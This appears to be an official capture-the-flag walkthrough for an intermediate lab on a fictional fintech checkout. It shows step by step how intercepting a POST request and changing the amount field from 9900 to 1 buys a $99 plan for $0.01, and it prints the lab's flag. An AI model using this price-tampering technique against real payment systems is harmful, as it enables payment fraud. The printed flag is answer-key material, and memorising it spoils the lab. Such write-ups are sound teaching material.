HACKR.GG
hackr.gg — Plan Checkout — eCorp Fintech Walkthrough
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Plan Checkout — eCorp Fintech

Business Logic Flaws · Client-Side Price Manipulation
Difficulty
Intermediate
Vuln class
Client-Side Price Manipulation
Steps
4
// Objective
Intercept the checkout request for eCorp's paid plan and manipulate the price field to pay $0.01 instead of the real price.
// Tools required
BrowserDeveloper ToolsBurp Suite
// Step-by-step walkthrough
1
Browse the pricing page
Navigate to the eCorp Fintech pricing page. Select the Pro Plan ($99/month) and proceed to checkout. Open DevTools → Network tab before clicking "Pay".
2
Intercept the checkout request
Click "Pay" and catch the outgoing POST request in the Network tab. Inspect the request body.
Command / Input
POST /api/checkout Content-Type: application/json {"plan":"pro","amount":9900,"currency":"usd"}
The amount field (in cents) is being sent from the client. The server trusts whatever number arrives — it never re-derives the price from the plan name.
3
Resend the request with a modified price
Use DevTools "Edit and Resend" or Burp Repeater to modify the amount field to 1 (= $0.01) and resend.
Command / Input
POST /api/checkout {"plan":"pro","amount":1,"currency":"usd"}
Output
{"status":"success","message":"Payment accepted","receipt":"TXN-00291"}
The server accepted $0.01 for a $99 plan. This is the core of price manipulation — the server delegated the authoritative price to the untrusted client.
4
Retrieve the flag
After the successful "purchase", the flag appears on the order confirmation page.
Output
HackrGG{bus1n3ss_l0g1c_pr1c3_t4mp3r}
// Flag
Flag value
HackrGG{bus1n3ss_l0g1c_pr1c3_t4mp3r}
Shown on the order confirmation page after a successful manipulated checkout.
hackr.gg · Cybersecurity Education PlatformEducational use only · Do not distribute